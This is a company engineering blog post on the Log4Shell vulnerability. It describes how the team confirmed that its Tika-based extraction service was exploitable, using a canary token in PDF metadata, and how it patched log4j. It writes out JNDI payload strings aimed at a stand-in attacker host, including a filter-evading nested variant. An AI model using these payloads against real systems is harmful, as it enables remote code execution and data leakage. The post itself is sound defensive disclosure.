Exploring the Log4Shell Vulnerability

Jan Hecking · 4/4/2023 · 7 Min Read

How we determined whether our software is susceptible to the Log4Shell vulnerability, crafted a demo exploit, and then resolved the issue.

By now everyone should have heard of the recent zero-day remote code execution (RCE) vulnerability in the popular Apache Log4j library. First announced on Twitter on December 9, 2021, and later published as CVE-2021-44228, this vulnerability has kept teams busy patching their services for the past month.

At Borneo, we do not use much Java in our own software stack, so when checking how our software might be affected by this vulnerability, we could focus our attention on a single microservice. This service, called the Extraction service, uses the open-source Apache Tika library to extract plain text from various file formats such as PDFs, Office documents, etc. Borneo needs this in order to detect sensitive information in such documents. And since Apache Tika is implemented in Java, the Extraction service was also implemented in Java, using the Spring Boot framework, and it used the vulnerable log4j2 library for logging.


Understanding the log4j vulnerability

Tl;dr: If a user of your application controls a string that at any point gets included in a log message logged by a vulnerable version of log4j, that user can instruct your application to load executable code from a remote server under the user's control, and have it execute that code!


To understand if and how the log4j RCE vulnerability might be exploited in our Extraction service, it is first necessary to understand how the vulnerability works. log4j is a very flexible logging library, and one of its most powerful features is property substitution: the ability to include placeholder values in various places that will be resolved into concrete values at run-time. Up to and including version 2.14.1, property substitution was also enabled (by default) in log messages. That means that if an application includes a logging statement like logger.info("${name}"), then log4j will try to resolve the true value of ${name} whenever that logging statement gets called. Not only that, but if the application includes a logging statement like logger.info("value: {}", value) and the value variable has a runtime value of "${name}", then log4j will also attempt to resolve the ${name} placeholder.

How log4j tries to resolve the value of ${name} depends on the given name itself. While name can refer to a property value specified in the log4j configuration, log4j also supports various prefixes that allow even more dynamic lookup of property values. For example, based on the env: prefix, log4j will replace a placeholder like ${env:MY_ENV} with the value of the MY_ENV environment variable at runtime.

To summarize: if an application logs a message which includes a run-time variable, and that variable's value includes a string like "${name}", then log4j (before v2.15.0) will automatically attempt to resolve the given name using a variety of schemes. By now it should be clear how this can be problematic, because in many cases the value of such variables included in log messages might be fully or partially controlled by a user. This is akin to using a user-controlled variable to construct an SQL statement, which is then sent to a database server, and which could be exploited using a SQL injection attack.
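As a minimal sketch of this behavior (illustrative only; the class name and input value are made up, not code from our service), consider what a vulnerable log4j version does when a user-controlled value carries a lookup placeholder:

    import org.apache.logging.log4j.LogManager;
    import org.apache.logging.log4j.Logger;

    public class LookupDemo {
        private static final Logger logger = LogManager.getLogger(LookupDemo.class);

        public static void main(String[] args) {
            // Imagine this value arrives from a user, e.g. via an HTTP header.
            String userInput = "${env:MY_ENV}";

            // With log4j <= 2.14.1, the placeholder inside the parameter value
            // is resolved too: the log line ends up containing the value of the
            // MY_ENV environment variable instead of the literal string.
            logger.info("received input: {}", userInput);
        }
    }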


What makes this vulnerability really critical, though, is the fact that log4j also supports replacing property values using the Java Naming and Directory Interface (JNDI) via the jndi: property name prefix. JNDI itself is a very flexible API that allows clients to discover and look up data as well as Java objects by name from a variety of different sources. One typical use, according to the JNDI Wikipedia page, is to connect a Java application to an external directory service such as an LDAP server. Without going further into detail about the Lightweight Directory Access Protocol (LDAP), suffice it to say that this combination of JNDI and LDAP enables us to look up and retrieve Java objects (i.e. executable Java code!) from a remote LDAP server, and execute them! And all just by including a property "name" in a log message, such as ${jndi:ldap://some-attacker.com/a}!
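In simplified terms, the lookup log4j performs for such a placeholder boils down to a plain JNDI call. The following is an illustrative sketch of the idea, not log4j's actual internal code:

    import javax.naming.Context;
    import javax.naming.InitialContext;

    public class JndiLookupSketch {
        public static void main(String[] args) throws Exception {
            Context ctx = new InitialContext();

            // This call contacts the attacker-controlled LDAP server. In
            // vulnerable JVM/log4j configurations, the server's response can
            // reference a remote Java class, which the client then downloads,
            // instantiates, and thereby executes.
            Object payload = ctx.lookup("ldap://some-attacker.com/a");
            System.out.println(payload);
        }
    }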


Determining whether Borneo's Extraction service was vulnerable

Now that we understand how this log4j vulnerability works, we have a better idea of how it could be exploited in a service such as our aforementioned Borneo extraction service, which, at the time, included a vulnerable version of log4j. The extraction service takes as input arbitrary files, which have been fetched from a remote location. If the service were to log any text content extracted from a file, then an attacker who could get the extraction service to process a crafted malicious file could use it to trigger the vulnerability. Of course, the extraction service does not log the actual text contents of the files it processes; that content might contain sensitive information, after all. But depending on the file type, Apache Tika also extracts additional metadata from the file, such as the document author or title, the name of the application which created the file, and more. Some of that metadata can be useful for subsequent processing steps, and as it turns out, the extraction service did indeed log certain extracted file metadata under specific conditions.
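To make the attack surface concrete, here is a hypothetical sketch (not Borneo's actual code) of how a service might extract and log document metadata with Apache Tika. The file name and the choice of logged metadata field are assumptions for illustration:

    import java.io.InputStream;
    import java.nio.file.Files;
    import java.nio.file.Path;

    import org.apache.logging.log4j.LogManager;
    import org.apache.logging.log4j.Logger;
    import org.apache.tika.metadata.Metadata;
    import org.apache.tika.metadata.TikaCoreProperties;
    import org.apache.tika.parser.AutoDetectParser;
    import org.apache.tika.sax.BodyContentHandler;

    public class MetadataExtractionSketch {
        private static final Logger logger =
            LogManager.getLogger(MetadataExtractionSketch.class);

        public static void main(String[] args) throws Exception {
            AutoDetectParser parser = new AutoDetectParser();
            BodyContentHandler handler = new BodyContentHandler();
            Metadata metadata = new Metadata();

            // Parse the document; Tika fills in both the plain text (handler)
            // and any metadata it finds (metadata).
            try (InputStream stream = Files.newInputStream(Path.of("input.pdf"))) {
                parser.parse(stream, handler, metadata);
            }

            // Danger zone: the title is attacker-controlled. If it contains
            // "${jndi:ldap://...}" and log4j is vulnerable, this single log
            // statement is enough to trigger the lookup.
            logger.info("extracted document title: {}",
                metadata.get(TikaCoreProperties.TITLE));
        }
    }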


Crafting an exploit

Now that we knew that the extraction service might indeed be vulnerable, the fun part began: trying to craft an exploit. At this point, we knew that if we could craft a malicious file which includes a string such as ${jndi:ldap://some-attacker.com/a} somewhere in the file metadata, and get the extraction service to process that file, that should trigger the log4j RCE vulnerability. Now, setting up an LDAP server, and getting it to return a malicious payload in response to the request triggered by the ${jndi:ldap://some-attacker.com/a} payload, would have been quite a bit of work. Instead, we decided it would be good enough (or bad enough, if you will) to show that we could get the extraction service to initiate the request to the address in the attack payload, i.e. some-attacker.com. Fortunately, even that step was made easy, thanks to the fine folks at Thinkst Canary and their free Canary Tokens service! Using this service, we created a new Log4Shell canary token of the form ${jndi:ldap://x${hostName}.L4J.o26h...pzt8.canarytokens.com/a}. Note the nested ${hostName} lookup: log4j resolves it first, so the resulting request also leaks the host name of the vulnerable machine. If we could get the extraction service to include this token in a log4j log message, the service would attempt to contact the Canary Tokens service, which would record the request and notify us via email.

To create a document that includes this token in a place Apache Tika would extract it from, we simply created a plain text file and used the macOS print dialog to turn it into a PDF document using the "Save as PDF" functionality:

(Converting a plain text file into a PDF)


When creating the PDF document, macOS lets you set some additional document attributes, such as title, author, etc. We used this to include the attack payload in the document:

(Including our canary token in the PDF metadata)


Using the resulting file, we were able to trigger the log4j vulnerability easily, and we immediately received an email notification that our canary token had been triggered:

(Email notification when the canary token gets triggered)


Other possible attack vectors

The attack vector we managed to exploit in our own extraction service, via file metadata extracted by Apache Tika, is obviously quite specific. But all that is really necessary is that a potential attacker has some way to control any string that gets logged by a vulnerable application. It has been reported, for example, that simply changing an iPhone's name was enough to trigger the vulnerability in Apple's servers.

Potentially malicious user input can come from many sources, including form fields on websites, HTTP request headers such as the User-Agent header, user profile data in mobile applications, any kind of user-generated content, etc. As always, it is best to treat all such input as potentially dangerous and apply strict input filtering before the content is used in any way. Of course, that is easier said than done, as the widespread exploitation of this vulnerability shows; a naive filter is easily bypassed, as the sketch below illustrates.
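As an illustration of why filtering alone is a weak defense, here is a hypothetical, naive screening check (our own example, not a recommended mitigation). log4j's lookup syntax supports nesting, so obfuscated payloads slip past simple substring matches:

    public class NaiveInputFilter {
        // Naive check for the canonical Log4Shell payload shape. An attacker
        // can trivially evade this with nested lookups such as
        // "${${lower:j}ndi:ldap://...}", which contain no literal "${jndi:".
        static boolean looksSuspicious(String input) {
            return input != null && input.toLowerCase().contains("${jndi:");
        }

        public static void main(String[] args) {
            System.out.println(
                looksSuspicious("${jndi:ldap://some-attacker.com/a}"));           // true
            System.out.println(
                looksSuspicious("${${lower:j}ndi:ldap://some-attacker.com/a}")); // false: evaded!
        }
    }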


Addressing the vulnerability

Now that we had definite proof that our extraction service was vulnerable, we set to work to address the vulnerability and patch all deployed services, including those running for our customers, as quickly as possible. The Apache log4j team had quickly released version 2.15.0 of the library, which disables the problematic property substitution in log messages by default. Since we didn't depend on this feature anyway, updating to a non-vulnerable library version was a quick fix. Since then, several other, related vulnerabilities have been discovered in the log4j library; at present, version 2.17.1 is the latest released version, and the version that we are now using as well. With the attention of many security researchers focused on the log4j library at the moment, it is quite likely that more vulnerabilities will be discovered over the coming weeks and months, but we are prepared to keep on top of things and patch our systems as and when necessary.
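As a practical note for teams in the same situation: for Maven builds that inherit the Spring Boot parent POM (we won't go into the specifics of our own build setup here), it is enough to override the log4j2.version property, e.g. by adding <log4j2.version>2.17.1</log4j2.version> to the <properties> section of the pom.xml, to force every managed log4j2 module onto the patched release.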

Many thanks to the LunaSec team, who have been posting accurate and timely information about this so-called Log4Shell vulnerability on their blog!



